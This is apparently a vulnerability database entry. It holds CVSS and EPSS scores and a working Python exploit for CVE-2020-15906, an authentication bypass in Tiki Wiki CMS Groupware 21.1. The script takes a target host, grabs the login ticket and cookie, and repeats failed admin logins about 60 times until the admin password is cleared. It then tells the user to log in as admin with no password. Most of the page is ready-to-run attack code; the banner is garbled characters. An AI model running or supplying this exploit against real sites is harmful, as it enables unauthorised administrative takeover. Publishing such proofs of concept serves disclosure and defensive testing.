CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
83.1%
# Exploit Title: Tiki Wiki CMS Groupware 21.1 - Authentication Bypass
# Date: 01.08.2020 (1st August 2020)
# Exploit Author: Maximilian Barz aka. Silky
# Vendor Homepage: tiki.org
# Software Link: https://jztkft.dl.sourceforge.net/project/tikiwiki/Tiki_21.x_UY_Scuti/21.1/tiki-21.1.zip
# Version: 21.1
# Tested on: Kali Linux 5.7.0-kali1-amd64
#!/usr/bin/env/python3
import requests
import json
import lxml.html
import sys
banner = '''
āāāāāāāāāāāāāāā āāāāāāāāā āāāāāāāāā āāāāāā āāāāāāā āāā āāā
āāāāāāāāāāāāāāā āāāāāāāāāā āāāāāāāāā āāāāāāā āāāāāāāāāāāā āāāā
āāā āāāāāāāāāā āāāāāā āā āāāāāāāāāāāāā āāā āāāāāāāāāāā āāāā
āāā āāāāāāāāāā āāāāāāāāāāāāāāāāāāāāāāā āāā āāāāāāā āāā āāā
āāā āāāāāā āāāāāāāāāāāāāāāāāāāāāā āāāāāā āāāāāāāā āāāāāāāāā
āāā āāāāāā āāāāāā āāāāāāāā āāāāāā āāāāāā āāāāāāāā āāāāāāāāā
āāāāāā āāā āāāāāāāāāāāāāāā āāāāāāāāāāāāāāā āāāāāāāāāāāāāāā āāāāāāā āāāāāā āāāāāāāāāāāā āāāāāāā āāāā āāā āāāāāāā āāā āāāāāāāāāā āāāāāā āāāāāāāāāāāāāāāā
āāāāāāāāāāā āāāāāāāāāāāāāāā āāāāāāāāāāāāāāāā āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā āāā āāāāāāāāāāāā āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
āāāāāāāāāāā āāā āāā āāāāāāāāāāāāāā āāāāāā āāā āāā āāāāāā āāāāāāāā āāā āāāāāā āāāāāāāāā āāā āāāāāāāā āāāāāāā āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
āāāāāāāāāāā āāā āāā āāāāāāāāāāāāāā āāāāāāāāāā āāā āāāāāā āāāāāāāā āāā āāāāāā āāāāāāāāāāāāā āāāāāāāā āāāāā āāāāāāā āāāāāāāāāāāāāāāāāāāāāāāā
āāā āāāāāāāāāāāā āāā āāā āāāāāāāāāāāāāā āāāāāā āāā āāāāāāāāāāāāāā āāā āāā āāāāāāāāāāāāāāā āāāāāā āāāāāāāāā āāā āāā āāā āāāāāāāāāāāāāāāāāāā
āāā āāā āāāāāāā āāā āāā āāāāāāāāāāāāāā āāāāā āāā āāā āāāāāāāāāā āāā āāā āāā āāāāāāā āāā āāāāāāāāāāāāāāāāāāāā āāā āāā āāā āāāāāāāāāāāāāāāāāāā
Poof of Concept for CVE-2020-15906 by Maximilian Barz, Twitter: S1lky_1337
'''
def main():
if(len(sys.argv) < 2):
print(banner)
print("Usage: %s <host> " % sys.argv[0])
print("Eg: %s 1.2.3.4 " % sys.argv[0])
return
rhost = sys.argv[1]
url = "http://"+rhost+"/tiki/tiki-login.php"
session = requests.Session()
def get_ticket():
r = requests.get(url)
login_page = r.text.encode('utf-8')
html = lxml.html.fromstring(login_page)
auth = html.xpath('//input[@name="ticket"]/@value')
return str(auth)[2:-2]
def get_cookie():
session.get(url)
return session.cookies.get_dict()
cookie = get_cookie()
ticket = get_ticket()
payload = {'ticket': ticket,'user':'admin', 'pass':'test','login':'','stay_in_ssl_mode_present':'y','stay_in_ssl_mode':'n'}
headers = {
'Host': rhost,
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzrhost, deflate',
'Referer': 'http://'+rhost+'/tiki/tiki-login.php',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '125',
'Connection': 'close',
'Upgrade-Insecure-Requests': '1',
'Cache-Control': 'max-age=0',
}
for i in range(60):
r = session.post(url, payload, headers)
if("Account requires administrator approval." in r.text):
print("Admin Password got removed.")
print("Use BurpSuite to login into admin without a password ")
if(__name__ == '__main__'):
main()
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
83.1%